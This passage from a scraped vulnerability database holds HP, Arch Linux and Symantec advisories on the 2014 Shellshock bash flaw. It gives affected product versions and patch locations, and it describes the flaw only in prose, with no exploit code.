are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQ3EYoACgkQ4B86/C0qfVlGiwCg5w4oGFIiHcG0BQW5u4uoPxef\r\nzhMAoNKjX1w2l4V/RvE12LAfaB6he8Ak\r\n=V6d1\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-10-13T00:00:00", "published": "2014-10-13T00:00:00", "id": "SECURITYVULNS:DOC:31150", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31150", "title": "[security bulletin] HPSBST03122 rev.1 - HP StoreAll Operating System Software running Bash Shell, Remote Code Execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04471546\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04471546\r\nVersion: 1\r\n\r\nHPSBHF03124 rev.1 - HP Thin Clients running Bash, Remote Execution of Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-10-03\r\nLast Updated: 2014-10-03\r\n\r\nPotential Security Impact: Injection of code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with certain HP Thin\r\nClients running bash. The vulnerabilities, known as shellshock could be\r\nexploited remotely to allow execution of code.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101728\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nNote: all versions of HP Thin Pro and HP Smart Zero Core operating systems\r\nprior to version 5.1.0 are affected by this vulnerability. Following is a\r\ncomplete list of affected operating systems.\r\n\r\nHP ThinPro\r\n\r\nHP ThinPro 5.0 (released June 2014)\r\nHP ThinPro 4.4 (released November 2013)\r\nHP ThinPro 4.3 (released June 2013)\r\nHP ThinPro 4.2 (released November 2012)\r\nHP ThinPro 4.1 (released March 2012)\r\nHP ThinPro 3.2 (released November 2010)\r\nHP ThinPro 3.1 (released June 2010)\r\nHP ThinPro 3.0 (released November 2009)\r\nHP ThinPro 2.0 (released 2009)\r\nHP ThinPro 1.5 (released 2009)\r\nHP ThinPro 1.0 (released 2008)\r\n\r\nHP Smart Zero Core\r\n\r\nHP Smart Zero Core 5.0 (released June 2014)\r\nHP Smart Zero Core 4.4 (released November 2013)\r\nHP Smart Zero Core 4.3 (released June 2013)\r\nHP Smart Zero Core 4.2 (released November 2012)\r\nHP Smart Zero Core 4.1 (released March 2012)\r\nHP Smart Zero Core 4.0 (released March 2011)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has released the following software updates to resolve the vulnerability.\r\n\r\nProduct Affected\r\n Product Versions\r\n Patch Status\r\n\r\nHP ThinPro and HP Smart Zero Core (X86)\r\n v5.1.0 and above\r\n No update required; the Bash shell patch is incorporated into the base\r\nimage.\r\nIf you participated in the ThinPro 5.1.0 beta program upgrade to the release\r\nversion as soon as it becomes available.\r\n\r\nHP ThinPro and HP Smart Zero Core (x86)\r\n v5.0.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86.xar .\r\nThe update can be also downloaded directly from ftp://ftp.hp.com/pub/tcdebian\r\n/updates/5.0/service_packs/SecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86\r\n.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core (x86)\r\n v4.4.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar .\r\nOr can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/\r\nservice_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core (ARM)\r\n v4.4.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar .\r\nOr can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/\r\nservice_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core\r\n v4.3x and earlier\r\n An update will be made available for customers upon request\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 03 October 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQuzswACgkQ4B86/C0qfVlEmwCeKmjiIhep4sXipKg6EBSF8f5L\r\nmYcAnRPAcBRS9bs0c+WaszC9E7lEhSC/\r\n=dPt5\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-10-05T00:00:00", "published": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31125", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31125", "title": "[security bulletin] HPSBHF03124 rev.1 - HP Thin Clients running Bash, Remote Execution of Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:43", "bulletinFamily": "unix", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after\ncertain malformed function definitions in the values of environment\nvariables, which allows remote attackers to write to files or possibly\nhave unknown other impact via a crafted environment, as demonstrated by\nvectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi\nand mod_cgid modules in the Apache HTTP Server, scripts executed by\nunspecified DHCP clients, and other situations in which setting the\nenvironment occurs across a privilege boundary from Bash execution.", "modified": "2014-09-26T00:00:00", "published": "2014-09-26T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-September/000099.html", "id": "ASA-201409-2", "title": "bash: Remote code execution", "type": "archlinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-12T10:28:36", "bulletinFamily": "software", "description": "### Description\n\nGNU Bash is prone to remote code execution vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.\n\n### Technologies Affected\n\n * Advantech EKI-1320 1.98 \n * Advantech EKI-1320 \n * Alcatel-Lucent QIP \n * Apple Mac OS X 10.0.0 3 \n * Apple Mac OS X 10.0.0 \n * Apple Mac OS X 10.0.1 \n * Apple Mac OS X 10.0.2 \n * Apple Mac OS X 10.0.3 \n * Apple Mac OS X 10.0.4 \n * Apple Mac OS X 10.1.0 \n * Apple Mac OS X 10.1.1 \n * Apple Mac OS X 10.1.2 \n * Apple Mac OS X 10.1.3 \n * Apple Mac OS X 10.1.4 \n * Apple Mac OS X 10.1.5 \n * Apple Mac OS X 10.2.0 \n * Apple Mac OS X 10.2.1 \n * Apple Mac OS X 10.2.2 \n * Apple Mac OS X 10.2.3 \n * Apple Mac OS X 10.2.4 \n * Apple Mac OS X 10.2.5 \n * Apple Mac OS X 10.2.6 \n * Apple Mac OS X 10.2.7 \n * Apple Mac OS X 10.2.8 \n * Apple Mac OS X 10.3.0 \n * Apple Mac OS X 10.3.1 \n * Apple Mac OS X 10.3.2 \n * Apple Mac OS X 10.3.3 \n * Apple Mac OS X 10.3.4 \n * Apple Mac OS X 10.3.5 \n * Apple Mac OS X 10.3.6 \n * Apple Mac OS X 10.3.7 \n * Apple Mac OS X 10.3.8 \n * Apple Mac OS X 10.3.9 \n * Apple Mac OS X 10.4.0 \n * Apple Mac OS X 10.4.1 \n * Apple Mac OS X 10.4.10 \n * Apple Mac OS X 10.4.11 \n * Apple Mac OS X 10.4.2 \n * Apple Mac OS X 10.4.3 \n * Apple Mac OS X 10.4.4 \n * Apple Mac OS X 10.4.5 \n * Apple Mac OS X 10.4.6 \n * Apple Mac OS X 10.4.7 \n * Apple Mac OS X 10.4.8 \n * Apple Mac OS X 10.4.9 \n * Apple Mac OS X 10.5 \n * Apple Mac OS X 10.5.0 \n * Apple Mac OS X 10.5.1 \n * Apple Mac OS X 10.5.2 \n * Apple Mac OS X 10.5.3 \n * Apple Mac OS X 10.5.4 \n * Apple Mac OS X 10.5.5 \n * Apple Mac OS X 10.5.6 \n * Apple Mac OS X 10.5.7 \n * Apple Mac OS X 10.5.8 \n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6 Update 12 \n * Apple Mac OS X 10.6 Update 14 \n * Apple Mac OS X 10.6 Update 17 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X 10.6.5 \n * Apple Mac OS X 10.6.6 \n * Apple Mac OS X 10.6.7 \n * Apple Mac OS X 10.6.8 \n * Apple Mac OS X 10.7 \n * Apple Mac OS X 10.7.0 \n * Apple Mac OS X 10.7.1 \n * Apple Mac OS X 10.7.2 \n * Apple Mac OS X 10.7.3 \n * Apple Mac OS X 10.7.4 \n * Apple Mac OS X 10.7.5 \n * Apple Mac OS X 10.8 \n * Apple Mac OS X 10.8.0 \n * Apple Mac OS X 10.8.1 \n * Apple Mac OS X 10.8.2 \n * Apple Mac OS X 10.8.3 \n * Apple Mac OS X 10.8.4 \n * Apple Mac OS X 10.8.5 \n * Apple Mac OS X 10.8.5 Supplemental Update \n * Apple Mac OS X 10.9 \n * Apple Mac OS X 10.9.1 \n * Apple Mac OS X 10.9.2 \n * Apple Mac OS X 10.9.3 \n * Apple Mac OS X 10.9.4 \n * Apple Mac OS X 10.9.5 \n * Apple Mac OS X Server 10.7.5 \n * Appneta Pathview \n * Arista Networks EOS 4.14 \n * Arista Networks EOS 4.9 \n * Avaya 96x1 IP Deskphone 6 \n * Avaya 96x1 IP Deskphone 6.2 \n * Avaya 96x1 IP Deskphone 6.3 \n * Avaya 96x1 IP Deskphones 6.0 \n * Avaya 96x1 IP Deskphones 6.2 \n * Avaya ADS virtual app 2.0 \n * Avaya Aura Application Enablement Services 5.0 \n * Avaya Aura Application Enablement Services 5.2 \n * Avaya Aura Application Enablement Services 5.2.1 \n * Avaya Aura Application Enablement Services 5.2.2 \n * Avaya Aura Application Enablement Services 5.2.3 \n * Avaya Aura Application Enablement Services 5.2.4 \n * Avaya Aura Application Enablement Services 6.0 \n * Avaya Aura Application Enablement Services 6.1 \n * Avaya Aura Application Enablement Services 6.1.1 \n * Avaya Aura Application Enablement Services 6.1.2 \n * Avaya Aura Application Enablement Services 6.2 \n * Avaya Aura Application Enablement Services 6.3 \n * Avaya Aura Application Server 5300 SIP Core 2.0 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB16 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB19 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB23 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB25 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB26 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB28 \n * Avaya Aura Application Server 5300 SIP Core 2.1 \n * Avaya Aura Application Server 5300 SIP Core 3.0 \n * Avaya Aura Application Server 5300 SIP Core 3.0 PB3 \n * Avaya Aura Application Server 5300 SIP Core 3.0 PB5 \n * Avaya Aura Collaboration Environment 2.0 \n * Avaya Aura Collaboration Environment 3.0 \n * Avaya Aura Communication Manager 4.0 \n * Avaya Aura Communication Manager 4.0 \n * Avaya Aura Communication Manager 5.1 \n * Avaya Aura Communication Manager 5.2 \n * Avaya Aura Communication Manager 5.2.0 \n * Avaya Aura Communication Manager 5.2.1 \n * Avaya Aura Communication Manager 5.2.1 SP2 \n * Avaya Aura Communication Manager 5.2.1 SP4 \n * Avaya Aura Communication Manager 5.2.1 SP5 \n * Avaya Aura Communication Manager 5.2.1 SSP1 \n * Avaya Aura Communication Manager 5.2.1 SSP2 \n * Avaya Aura Communication Manager 5.2.1 SSP3 \n * Avaya Aura Communication Manager 6.0 \n * Avaya Aura Communication Manager 6.0.1 \n * Avaya Aura Communication Manager 6.2 \n * Avaya Aura Communication Manager 6.3 \n * Avaya Aura Communication Manager Utility Services 6.0 \n * Avaya Aura Communication Manager Utility Services 6.1 \n * Avaya Aura Communication Manager Utility Services 6.1 SP 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.2 \n * Avaya Aura Communication Manager Utility Services 6.2.4.0.15 \n * Avaya Aura Communication Manager Utility Services 6.2.5.0.15 \n * Avaya Aura Communication Manager Utility Services 6.3 \n * Avaya Aura Conferencing 7.0 \n * Avaya Aura Conferencing 7.0 Standard \n * Avaya Aura Conferencing 7.2 \n * Avaya Aura Conferencing 8.0 \n * Avaya Aura Conferencing Standard Edition 6.0 \n * Avaya Aura Experience Portal 6.0 \n * Avaya Aura Experience Portal 6.0 SP1 \n * Avaya Aura Experience Portal 6.0 SP2 \n * Avaya Aura Experience Portal 6.0.1 \n * Avaya Aura Experience Portal 6.0.2 \n * Avaya Aura Experience Portal 7.0 \n * Avaya Aura Messaging 6.0 \n * Avaya Aura Messaging 6.0.1 \n * Avaya Aura Messaging 6.1 \n * Avaya Aura Messaging 6.1.1 \n * Avaya Aura Messaging 6.2 \n * Avaya Aura Presence Services 6.0 \n * Avaya Aura Presence Services 6.1 \n * Avaya Aura Presence Services 6.1 SP1 \n * Avaya Aura Presence Services 6.1.1 \n * Avaya Aura Presence Services 6.1.2 \n * Avaya Aura Session Manager 5.2 \n * Avaya Aura Session Manager 5.2 SP1 \n * Avaya Aura Session Manager 5.2 SP2 \n * Avaya Aura Session Manager 5.2.1 \n * Avaya Aura Session Manager 6.0 \n * Avaya Aura Session Manager 6.0 SP1 \n * Avaya Aura Session Manager 6.0.1 \n * Avaya Aura Session Manager 6.1 \n * Avaya Aura Session Manager 6.1 SP1 \n * Avaya Aura Session Manager 6.1 SP2 \n * Avaya Aura Session Manager 6.1.1 \n * Avaya Aura Session Manager 6.1.2 \n * Avaya Aura Session Manager 6.1.3 \n * Avaya Aura Session Manager 6.1.5 \n * Avaya Aura Session Manager 6.2 \n * Avaya Aura Session Manager 6.2 SP1 \n * Avaya Aura Session Manager 6.2.1 \n * Avaya Aura Session Manager 6.2.2 \n * Avaya Aura Session Manager 6.3 \n * Avaya Aura System Manager 5.2 \n * Avaya Aura System Manager 6.0 \n * Avaya Aura System Manager 6.0 SP1 \n * Avaya Aura System Manager 6.1 \n * Avaya Aura System Manager 6.1 SP1 \n * Avaya Aura System Manager 6.1 SP2 \n * Avaya Aura System Manager 6.1.1 \n * Avaya Aura System Manager 6.1.2 \n * Avaya Aura System Manager 6.1.3 \n * Avaya Aura System Manager 6.1.5 \n * Avaya Aura System Manager 6.2 \n * Avaya Aura System Manager 6.2 SP3 \n * Avaya Aura System Manager 6.3 \n * Avaya Aura System Platform 1.0 \n * Avaya Aura System Platform 1.1 \n * Avaya Aura System Platform 6.0 \n * Avaya Aura System Platform 6.0 SP2 \n * Avaya Aura System Platform 6.0 SP3 \n * Avaya Aura System Platform 6.0.1 \n * Avaya Aura System Platform 6.0.2 \n * Avaya Aura System Platform 6.0.3.0.3 \n * Avaya Aura System Platform 6.0.3.8.3 \n * Avaya Aura System Platform 6.0.3.9.3 \n * Avaya Aura System Platform 6.2 \n * Avaya Aura System Platform 6.2 SP1 \n * Avaya Aura System Platform 6.2.1 \n * Avaya Aura System Platform 6.2.1.0.9 \n * Avaya Aura System Platform 6.3 \n * Avaya B189 IP Conference Phone 1.0 \n * Avaya B189 IP Conference Phone 1.0.0.22 \n * Avaya B189 IP Conference Phone 1.0.0.23 \n * Avaya CMS r17 \n * Avaya Collaboration Pod on VMware vCenter Server Appliance 2.0 \n * Avaya Communication Server 1000E 6.0 \n * Avaya Communication Server 1000E 7.0 \n * Avaya Communication Server 1000E 7.5 \n * Avaya Communication Server 1000E 7.6 \n * Avaya Communication Server 1000E Signaling Server 6.0 \n * Avaya Communication Server 1000E Signaling Server 7.0 \n * Avaya Communication Server 1000E Signaling Server 7.5 \n * Avaya Communication Server 1000E Signaling Server 7.6 \n * Avaya Communication Server 1000M 6.0 \n * Avaya Communication Server 1000M 7.0 \n * Avaya Communication Server 1000M 7.5 \n * Avaya Communication Server 1000M 7.6 \n * Avaya Communication Server 1000M Signaling Server 6.0 \n * Avaya Communication Server 1000M Signaling Server 7.0 \n * Avaya Communication Server 1000M Signaling Server 7.5 \n * Avaya Communication Server 1000M Signaling Server 7.6 \n * Avaya Configuration and Orchestration Manager \n * Avaya Configuration and Orchestration Manager COM 3.1 \n * Avaya Configuration and Orchestration Manager VPS 1.1 \n * Avaya Diagnostic Server 1.0 \n * Avaya Element Management System 6.0 \n * Avaya IP Flow Manager \n * Avaya IP Office Application Server 8.0 \n * Avaya IP Office Application Server 8.1 \n * Avaya IP Office Application Server 9.0 \n * Avaya IP Office Application Server 9.0 SP 1 \n * Avaya IP Office Application Server 9.0 SP 2 \n * Avaya IP Office Server Edition 8.0 \n * Avaya IP Office Server Edition 8.1 \n * Avaya IP Office Server Edition 9.0 \n * Avaya IQ 4.0 \n * Avaya IQ 4.1.0 \n * Avaya IQ 4.2 \n * Avaya IQ 5 \n * Avaya IQ 5.1 \n * Avaya IQ 5.1.1 \n * Avaya IQ 5.2 \n * Avaya Identity Engines Ignition Server 9.0.2 SP \n * Avaya Meeting Exchange 5.0 \n * Avaya Meeting Exchange 6.0 \n * Avaya Meeting Exchange 6.2 \n * Avaya Message Networking 5.2 \n * Avaya Message Networking 5.2 SP1 \n * Avaya Message Networking 5.2 SP3 \n * Avaya Message Networking 5.2 SP4 \n * Avaya Message Networking 5.2.1 \n * Avaya Message Networking 5.2.2 \n * Avaya Message Networking 5.2.3 \n * Avaya Message Networking 5.2.4 \n * Avaya Message Networking 5.2.5 \n * Avaya Message Networking 6.2.0 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Avaya Messaging Message Storage Server 5 \n * Avaya Messaging Message Storage Server 5.2.1 \n * Avaya Pod Orchestration Suite 1.0 \n * Avaya Pod Orchestration Suite 1.0.1 \n * Avaya Pod Orchestration Suite 2.0 \n * Avaya Proactive Contact 5.0 \n * Avaya Proactive Contact 5.1 \n * Avaya SAL GW virtual app 1.0 \n * Avaya Secure Access Core Concentrator 5.0 \n * Avaya Secure Access Core Concentrator 6.0 \n * Avaya Secure Access Link 1.5 \n * Avaya Secure Access Link 1.8 \n * Avaya Secure Access Link 2.0 \n * Avaya Secure Access Link GAS 5.0 \n * Avaya Secure Access Link GAS 6.0 \n * Avaya Secure Access Link Policy Server 1.5 \n * Avaya Secure Access Remote Access Concentrator 5.0 \n * Avaya Secure Access Remote Access Concentrator 6.0 \n * Avaya Services VM 1.0 \n * Avaya Services VM 2.0 \n * Avaya VPN Gateway 3050 \n * Avaya VPN Gateway 3070 \n * Avaya VPN Gateway 3090 \n * Avaya Virtualization Provisioning Service 1.1 \n * Avaya Visualization Fault and Performance Manager \n * Avaya Wireless LAN 9100 WOS with AOS 7.0.5 \n * Avaya one-X Client Enablement Services 6.1 \n * Avaya one-X Client Enablement Services 6.1.1 \n * Avaya one-X Client Enablement Services 6.1.2 \n * Avaya one-X Client Enablement Services 6.2 \n * Brocade Fibre Channel switches \n * CentOS CentOS 5 \n * Checkpoint Gaia Embedded NGX R65 \n * Checkpoint Gaia Embedded R70 \n * Checkpoint Gaia Embedded R70.1 \n * Checkpoint Gaia Embedded R70.20 \n * Checkpoint Gaia Embedded R70.30 \n * Checkpoint Gaia Embedded R70.40 \n * Checkpoint Gaia Embedded R70.50 \n * Checkpoint Gaia Embedded R71 \n * Checkpoint Gaia Embedded R71.10 \n * Checkpoint Gaia Embedded R71.20 \n * Checkpoint Gaia Embedded R71.30 \n * Checkpoint Gaia Embedded R71.40 \n * Checkpoint Gaia Embedded R71.45 \n * Checkpoint Gaia Embedded R71.50 \n * Checkpoint Gaia Embedded R75 \n * Checkpoint Gaia Embedded R75.10 \n * Checkpoint Gaia Embedded R75.20 \n * Checkpoint Gaia Embedded R75.30 \n * Checkpoint Gaia Embedded R75.40 \n * Checkpoint Gaia Embedded R75.40VS \n * Checkpoint Gaia Embedded R75.45 \n * Checkpoint Gaia Embedded R75.46 \n * Checkpoint Gaia Embedded R75.47 \n * Checkpoint Gaia Embedded R76 \n * Checkpoint Gaia Embedded R77 \n * Checkpoint Gaia Embedded R77.10 \n * Checkpoint Gaia Embedded R77.20 \n * Checkpoint Gaia NGX R65 \n * Checkpoint Gaia Os R75.0 \n * Checkpoint Gaia Os R76.0 \n * Checkpoint Gaia R70 \n * Checkpoint Gaia R70.1 \n * Checkpoint Gaia R70.20 \n * Checkpoint Gaia R70.30 \n * Checkpoint Gaia R70.40 \n * Checkpoint Gaia R70.50 \n * Checkpoint Gaia R71 \n * Checkpoint Gaia R71.10 \n * Checkpoint Gaia R71.20 \n * Checkpoint Gaia R71.30 \n * Checkpoint Gaia R71.40 \n * Checkpoint Gaia R71.45 \n * Checkpoint Gaia R71.50 \n * Checkpoint Gaia R75 \n * Checkpoint Gaia R75.10 \n * Checkpoint Gaia R75.20 \n * Checkpoint Gaia R75.30 \n * Checkpoint Gaia R75.40VS \n * Checkpoint Gaia R75.45 \n * Checkpoint Gaia R75.46 \n * Checkpoint Gaia R75.47 \n * Checkpoint Gaia R76 \n * Checkpoint Gaia R77 \n * Checkpoint Gaia R77.10 \n * Checkpoint Gaia R77.20 \n * Checkpoint IPSO 6.2 NGX R65 \n * Checkpoint IPSO 6.2 R70 \n * Checkpoint IPSO 6.2 R70.1 \n * Checkpoint IPSO 6.2 R70.20 \n * Checkpoint IPSO 6.2 R70.30 \n * Checkpoint IPSO 6.2 R70.40 \n * Checkpoint IPSO 6.2 R70.50 \n * Checkpoint IPSO 6.2 R71 \n * Checkpoint IPSO 6.2 R71.10 \n * Checkpoint IPSO 6.2 R71.20 \n * Checkpoint IPSO 6.2 R71.30 \n * Checkpoint IPSO 6.2 R71.40 \n * Checkpoint IPSO 6.2 R71.45 \n * Checkpoint IPSO 6.2 R71.50 \n * Checkpoint IPSO 6.2 R75 \n * Checkpoint IPSO 6.2 R75.10 \n * Checkpoint IPSO 6.2 R75.20 \n * Checkpoint IPSO 6.2 R75.30 \n * Checkpoint IPSO 6.2 R75.40 \n * Checkpoint IPSO 6.2 R75.40VS \n * Checkpoint IPSO 6.2 R75.45 \n * Checkpoint IPSO 6.2 R75.46 \n * Checkpoint IPSO 6.2 R75.47 \n * Checkpoint IPSO 6.2 R76 \n * Checkpoint IPSO 6.2 R77 \n * Checkpoint IPSO 6.2 R77.10 \n * Checkpoint IPSO 6.2 R77.20 \n * Checkpoint SecurePlatform 2.6 NGX R65 \n * Checkpoint SecurePlatform 2.6 R70 \n * Checkpoint SecurePlatform 2.6 R70.1 \n * Checkpoint SecurePlatform 2.6 R70.20 \n * Checkpoint SecurePlatform 2.6 R70.30 \n * Checkpoint SecurePlatform 2.6 R70.40 \n * Checkpoint SecurePlatform 2.6 R70.50 \n * Checkpoint SecurePlatform 2.6 R71 \n * Checkpoint SecurePlatform 2.6 R71.10 \n * Checkpoint SecurePlatform 2.6 R71.20 \n * Checkpoint SecurePlatform 2.6 R71.30 \n * Checkpoint SecurePlatform 2.6 R71.40 \n * Checkpoint SecurePlatform 2.6 R71.45 \n * Checkpoint SecurePlatform 2.6 R71.50 \n * Checkpoint SecurePlatform 2.6 R75 \n * Checkpoint SecurePlatform 2.6 R75.10 \n * Checkpoint SecurePlatform 2.6 R75.20 \n * Checkpoint SecurePlatform 2.6 R75.30 \n * Checkpoint SecurePlatform 2.6 R75.40 \n * Checkpoint SecurePlatform 2.6 R75.40VS \n * Checkpoint SecurePlatform 2.6 R75.45 \n * Checkpoint SecurePlatform 2.6 R75.46 \n * Checkpoint SecurePlatform 2.6 R75.47 \n * Checkpoint SecurePlatform 2.6 R76 \n * Checkpoint SecurePlatform 2.6 R77 \n * Checkpoint SecurePlatform 2.6 R77.10 \n * Checkpoint SecurePlatform 2.6 R77.20 \n * Checkpoint SecurePlatform NGX R65 \n * Checkpoint SecurePlatform R70 \n * Checkpoint SecurePlatform R70.1 \n * Checkpoint SecurePlatform R70.20 \n * Checkpoint SecurePlatform R70.30 \n * Checkpoint SecurePlatform R70.50 \n * Checkpoint SecurePlatform R71 \n * Checkpoint SecurePlatform R71.10 \n * Checkpoint SecurePlatform R71.20 \n * Checkpoint SecurePlatform R71.40 \n * Checkpoint SecurePlatform R71.45 \n * Checkpoint SecurePlatform R71.50 \n * Checkpoint SecurePlatform R75.10 \n * Checkpoint SecurePlatform R75.20 \n * Checkpoint SecurePlatform R75.30 \n * Checkpoint SecurePlatform R75.40 \n * Checkpoint SecurePlatform R75.40VS \n * Checkpoint SecurePlatform R75.45 \n * Checkpoint SecurePlatform R75.46 \n * Checkpoint SecurePlatform R75.47 \n * Checkpoint 